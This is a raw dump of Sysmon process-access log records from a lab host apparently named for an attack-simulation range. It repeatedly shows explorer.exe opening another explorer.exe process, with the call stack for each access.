16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.718{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 